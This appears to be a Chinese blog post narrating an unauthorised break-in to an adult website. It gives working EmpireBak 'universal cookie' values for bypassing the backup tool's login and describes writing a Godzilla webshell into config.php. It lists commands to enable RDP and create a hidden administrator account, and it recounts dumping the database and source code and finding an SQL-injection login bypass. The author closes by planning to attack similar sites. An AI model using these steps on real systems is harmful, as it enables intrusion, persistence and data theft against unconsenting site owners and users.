信息收集

碰到一个有色网站，就动手试了一下

扫了一下目录后发现有bak目录，进去一看是个帝国备份王，顿时觉得有戏

Empirebak getshell

参考链接：
http://t.zoukankan.com/LittleHann-p-4519968.html

先使用万能cookie 进入后台，管理备份目录，网站会生成一个备份文件config.php，再利用字符串替换的功能把webshell写入config.php

ebak_loginebakckpass:119770adb578053dcb383f67a81bcbc6     
ebak_bakrnd:35y5cCnnA4Kh     
ebak_bakusername:admin     
ebak_baklogintime:4070883661

这里我写入一个哥斯拉马

开启远程桌面

哥斯拉马连接后，发现主机是Windows Server 2008 

执行 tasklist /svc ，发现没有任何杀软，权限为nt authority/system

下面是开启windows远程桌面的基本命令，在远程桌面开启的情况下，通过tasklist 和netstat 命令找到远程桌面连接端口，并创建用户连接

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections    # 查看RDP服务是否开启: 1关闭, 0开启
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\ WinStations\RDP-Tcp" /v PortNumber    # 查看 RDP 服务的端口
tasklist /svc | find "TermService"  #查看进程号
netstat -ano | find "2960"  #根据进程号找到端口 
shell net user yanshu$ 123456 /add  #创建远程桌面用户
shell net localgroup administrators yanshu$ /add

找到Web目录，直接拖源码下来

脱库

在帝国备份王配置文件中找到连接mysql数据库的用户和密码

将数据库数据打包下载，还可以看到管理员用户和密码

数据库里也全是“学习资源”

通过webshell找到后台路径，进入管理后台

代码审计

简单代码审计后，发现很多功能都存在漏洞

比如后台登录功能就存在SQL注入，可以闭合单引号，union注入来绕过密码验证

接下来会审计出其他漏洞后会找一些相似网站尝试后再更新